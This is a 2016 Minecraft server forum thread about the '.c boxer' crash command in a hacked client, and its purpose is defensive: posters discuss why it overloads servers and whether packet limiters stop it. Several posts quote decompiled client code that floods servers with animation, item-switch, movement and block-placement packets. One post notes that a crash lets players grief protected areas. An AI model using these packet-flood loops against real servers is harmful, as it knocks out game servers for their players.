'.c boxer' Crash command Conceit Client

Discussion in 'Spigot Discussion' started by YepImRobbie, Jun 30, 2016.

Thread Status:
Not open for further replies.
  1. Is this hack still working? I hope not.

     
    • Like Like x 1
  2. Yes, how to patch?
     
  3. Yes, it still works. It ss extremely easy to patch however.
     
  4. Well, technically it's an overload exploit, which causes the server to do a lot of heavy computing, which effectively causes the targeted servers to drop all connections.
     
  5. It is still working, but not on every server.

    That's the module (decompiled with Luyten):

    Code (Text):
                case "boxer": {
                    for (int index = 0; index < 1000000; ++index) {
                        this.minecraft.getNetHandler().addToSendQueue(new C0APacketAnimation());
                    }
                    break;
                }
    To patch it, you only need a plugin which limits the packets.
     
  6. I tried it on some servers and most of them can handle it just fine and don't crash.
     
  7. That's depending on the size of the server. Also, you have to do it "right". Just executing it once is mostly useless, but if you spam the command, it often leads to a crash. Remember: You will not get a "crash" message, the server will just don't reply the players (you can remove blocks in protected areas for example when the server stops replying to the users.)
     
  8. That is a general patch, which can cause issues. A much better alternative would be to patch the actual exploit.
     
  9. No. AAC uses also a packet limiter without any problems. And by the way: 1.9 and 1.10 servers have packet limiters by default so they should block this automatically.
     
  10. Depending on the buffer it could cause issues if the server has a lag spike.
     
  11. *Small facepalm*

    Look at the code and look at a good buffer for example from AAC... In the code you can see that it uses "1.000.000" packets, and (with buffer) AAC allows a max. of 50 and the most never have problems with AAC.

    So it would be absolutely NO problem to limit it to 100 or 200 packets per second, this would be far away from 1.000.000 so it is blocked very good.
     
  12. So what it sends 1,000,000 packets, when it doesn't even need to send a fraction of those to lag the server. Also you are missing those whole point of my post. A buffer of 50 packets per second, or even 100 to be generous would be perfectly fine, unless connection lag spikes occur. But still, limiting packets is a good general idea, however it doesn't exactly patch this exploit.
     
  13. AAC seems to use a limit of 50 but it works perfectly fine also on lag-spikes. (You could check the TPS etc. with your packet-limiter plugin to make also sure that it detects a lag-spike.)

    That's not true. I tried this also on my own server. You need to spam the ".crash" command and after a few minutes the server stopped. So there are a lot of packets needed.
     
  14. FormallyMyles

    Supporter

    I think NoCheat might have basic protection, I've seen people use ViaVersion in the past just for this purpose because we include a basic one to prevent this kinda stuff.
     
    • Like Like x 1
  15. What the hell, I posted this on 30th June and now it gets responses. By the way @Mylescomputer I love you and your plugin, papa bless you.
     
    • Like Like x 1
  16. IIRC NoCheatPlus' builds since #1020 offer a packet throttle for pre-1.9 servers. It may need additional configuration.

    https://github.com/NoCheatPlus/NoCheatPlus/commit/fc24fe529c70c449c6b343d3685b72e1cdaf1142

    The "actual" exploit is just a simple overload of system resources. Unfortunately you can't simply patch the fact that computers have finite resources.

    A major benefit of using animation packet here is because the animation packet is rebroadcasted to nearby players (and there's zero validation on the packet's data.) The resulting allocations strain the CPU due to creating pressure in the garbage collector, and what little CPU is left over is used to process the incoming packets in the tick loop; which ends up compounding the issue by rebroadcasting new outgoing packets.

    This is all easily shown if you attach a profiler and observe the "exploit" in action.

    The best and only true way to patch this is a throttle; like restricting incoming packets to 500 per second (you could restrict is way lower than that) or adjusted the max processed packets per player in NetworkManager. Even if someone lags, that still accounts for over 20 seconds of gameplay (20 movement packets per second + buffer zone for actions/attacks/etc) - so it's nearly impossible for that to cause gameplay problems. 500 packets per second can still harm the server, but a general strain can be combatted vs process death.
     
    #17 Cryptkeeper, Aug 1, 2016
    Last edited: Aug 1, 2016
    • Winner Winner x 1
    • Informative Informative x 1
  17. The overloading is cause by the fact that each time the player swings their arm, the Bukkit implementation does some heavy calculations to perform a ray tracing check, the overload isn't caused by sending swing animations to nearby players, but it certainly helps a little.
     
  18. A packet limiter is better than patching just this one exploit, because there are more crash exploits with many packets:

    Code (Text):
    case "itemswitch": {
                    for (int index = 0; index < 100000; ++index) {
                        this.minecraft.getNetHandler().addToSendQueue(new C09PacketHeldItemChange(2));
                        this.minecraft.getNetHandler().addToSendQueue(new C03PacketPlayer(true));
                        this.minecraft.getNetHandler().addToSendQueue(new C09PacketHeldItemChange(2));
                        this.minecraft.getNetHandler().addToSendQueue(new C03PacketPlayer(true));
                    }
                    break;
                }
    Code (Text):
    case "hop": {
                    for (int index2 = 0; index2 < 1000; ++index2) {
                        this.minecraft.getNetHandler().addToSendQueue(new C03PacketPlayer.C04PacketPlayerPosition(this.minecraft.thePlayer.posX, this.minecraft.thePlayer.posY + 0.1, this.minecraft.thePlayer.posZ, true));
                        this.minecraft.getNetHandler().addToSendQueue(new C03PacketPlayer.C04PacketPlayerPosition(this.minecraft.thePlayer.posX, this.minecraft.thePlayer.posY, this.minecraft.thePlayer.posZ, true));
                    }
                    break;
                }
    Code (Text):
    case "build": {
                    for (int index = 0; index < 10000; ++index) {
                        this.minecraft.getNetHandler().addToSendQueue(new C08PacketPlayerBlockPlacement(new ItemStack(Items.apple)));
                    }
                    break;
                }
    So basically a packet limiter is more effective than just fixing the animation packet exploit, because there are more exploits which all need to spam so many packets.
     
  19. I'm well aware of the exploits. I know the majority of the exploits for the game. I said a packet limiter was a general fix, however it shouldn't be used to fix this particular exploit.
     
Thread Status:
Not open for further replies.